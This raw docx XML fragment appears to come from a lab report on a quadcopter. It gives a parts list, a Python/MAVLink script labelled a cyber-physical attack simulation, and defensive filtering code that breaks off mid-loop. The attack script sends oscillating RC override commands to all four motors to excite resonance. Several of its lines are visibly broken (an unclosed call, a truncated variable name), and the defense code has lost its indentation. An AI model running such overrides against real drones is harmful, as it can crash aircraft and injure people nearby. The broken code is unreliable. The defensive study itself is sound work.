          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5BB6E3" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="085AEFCF" wp14:editId="23AE98A4">
            <wp:extent cx="5731510" cy="4043680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3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
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="4043680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F840884" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17479915" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30C86809" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="EE0000"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Item No. Component Qty Description</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>1 Main Chassis 1 Central quadcopter airframe and motor arms</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>2 Brushless Motor 4 Rotor propulsion units</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>3 Propeller 4 Rotor blades (Blue)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>4 Landing Gear Assembly 1 Curved tubular legs and horizontal skids</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>5 Camera Gimbal 1 Underside payload module</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>6 Isolator Base Plate 1 Lower mount for the IMU assembly</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>7 Isolator Top Plate 1 Suspended IMU platform</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>8 Silicone Damper 4 Elastomeric shock absorbers (Blue)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>9 IMU / Flight Controller 1 Top-mounted avionics sensor module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134BFDF5" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PART 4 cyber-physical attack simulation (python and mavlink)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655A6DED" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Mission planner software for flight simulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593819B4" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C228725" wp14:editId="53A77FCA">
            <wp:extent cx="5731510" cy="3095625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="33"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2"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3095625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583EEADA" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Python code of the mavlink</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C48C95" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5BDE5135" wp14:editId="7ADE3C83">
            <wp:extent cx="5731510" cy="3084195"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34"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3"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3084195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51EC60" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>from pymavlink import mavutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E5D3D9" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFD2149" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>import math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF2A975" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t># 1. Establish connection to the flight controller (SITL or Lab Network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045BF9B3" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>connection_string = 'tcp:127.0.0.1:5762'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5786F5CF" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>print(f"Connecting to {connection_string}...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F90DF5C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>master = mavutil.mavlink_connection(connection_string)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D5D278" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>master.wait_heartbeat()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF81DC8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>print("Heartbeat received. Target locked.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359B79D8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289E146F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t># 2. Define the resonant attack parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5382AC4E" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t># This frequency (Hz) should match the vulnerable f_n found in your MATLAB transmissibility analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57191F33" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>resonant_frequency = 25.0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CED2D2" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>amplitude = 300            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7AC6B1" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>base_pwm = 1500            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17252648" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>def inject_vibration(duration):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073A518E" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>    print(f"Injecting resonant frequency: {resonant_frequency} Hz for {duration} seconds...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63576D4E" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    start_time = time.time(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C09366F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    # Calculate angular frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787A05C8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    omega = 2.0 * math.pi * resonant_frequenc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CB21A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    while (time.time() - start_time) &lt; duration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8997BD" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        current_time = time.time() - start_time   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8F1716" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>        # Harmonic excitation function</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38757046" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>        current_pwm = int(base_pwm + amplitude * math.sin(omega * current_time))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60F9A3" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>        # 3. Send aggressive MAVLink RC Override commands to all 4 motors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F558B46" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>        master.mav.rc_channels_override_send(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCCEAF4" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>            master.target_system,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435E431F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>            master.target_component,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241C3BF" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            current_pwm, current_pwm, current_pwm, current_pwm, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFF34CC" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            0, 0, 0, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C998212" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>        # Maintain a fast update rate to accurately simulate the high-frequency wave</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FF86F" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        time.sleep(0.01) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8A7298" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    # 4. Release overrides and return control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735B1ADD" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    master.mav.rc_channels_override_send(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092294FD" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>        master.target_system, master.target_component,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA5567" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>        0, 0, 0, 0, 0, 0, 0, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6AF955" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEBEC1A" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    print("Attack simulation complete. Control released.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD5A18" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t># Execute the attack for 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25060A7C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD00A0" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>    inject_vibration(10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9DE234" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35FBA3E8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CBCBE8" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Defensive engineering and sensor fusion filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525A47D7" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E2841"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E2841"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Défense strategy: adaptive notch filtering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C82E4A9" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>Instead of basing on physical dampening, the flight controllers can dynamically filter out frequencies of abnormal value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748B1443" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>defence implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16954BB3" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>Senser_defense.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7885C127" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Python sscript of code that detects and filters anormally frequences </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4FFF09" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import math</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>class FlightControllerDefense:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:t>(self, frequency_threshold=20.0, amplitude_limit=250):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.frequency_threshold = frequency_threshold</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.amplitude_limit = amplitude_limit</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.is_locked_down = False</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def monitor_and_filter(self, current_pwm, base_pwm):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>delta = abs(current_pwm - base_pwm)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Detect abnormal high-amplitude oscillation signatures</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if delta &gt; self.amplitude_limit:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if not self.is_locked_down:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print("[WARNING] Anomaly detected: High-frequency actuator variance exceeds safety limits!")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print("[DEFENSE] Engaging software notch filter and clamping motor mixing matrix.")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.is_locked_down = True</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Clamp the PWM to safe baseline hover limits to neutralize the attack vector</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>return base_pwm</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if self.is_locked_down and delta &lt;= self.amplitude_limit:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print("[INFO] Telemetry normalized. Restoring full manual control channels.")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.is_locked_down = False</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>return current_pwm</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Testing the defense filter logic against our attack profile</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> == '</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>defense = FlightControllerDefense()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>base_pwm = 1500</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Simulate receiving normal vs malicious attack signals</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>test_signals = [1510, 1520, 1800, 1850, 1490, 1500]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print("Running defense filter simulation...")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>for sig in test_signals:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>filtered_pwm = defense.monitor_and_filter(sig, base_pwm)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print(f"Input PWM: {sig} ---&gt; Filtered Active PWM: {filtered_pwm}")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>time.sleep(0.1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7DE81" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="005D7421">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="491FB35C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Real- time Mavlink Interception and Defense Loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6030A89C" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>full loop simulation code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C160DB" w14:textId="77777777" w:rsidR="005D7421" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
      </w:pPr>
      <w:r>
        <w:t>from pymavlink import mavutil</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import time</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>import math</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>class MAVLinkDefenseProxy:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
      <w:r>
        <w:t>(self, connection_string, amplitude_limit=250):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.connection_string = connection_string</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.amplitude_limit = amplitude_limit</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.base_pwm = 1500</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.is_locked_down = False</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print(f"Connecting to target: {connection_string}...")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.master = mavutil.mavlink_connection(connection_string)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>self.master.wait_heartbeat()</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print("Heartbeat locked. Defense proxy active.")</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>def run_proxy(self):</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>try:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>while True:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Listen for incoming messages (like RC_CHANNELS_OVERRIDE)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>msg = self.master.recv_match(type=['RC_CHANNELS_OVERRIDE', 'COMMAND_LONG'], blocking=True, timeout=1.0)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if msg and msg.get_type() == 'RC_CHANNELS_OVERRIDE':</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t># Extract channel 1 override value as a test vector</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>chan1 = msg.chan1_raw</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if chan1 &gt; 0: # If an override is active</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>delta = abs(chan1 - self.base_pwm)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>if delta &gt; self.amplitude_limit:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>print(f"[SECURITY ALERT] Malicious frequency spike detected! PWM: {chan1}. Neutralizing...")</w:t>
      </w:r>
      <w:r>
        <w:br/>
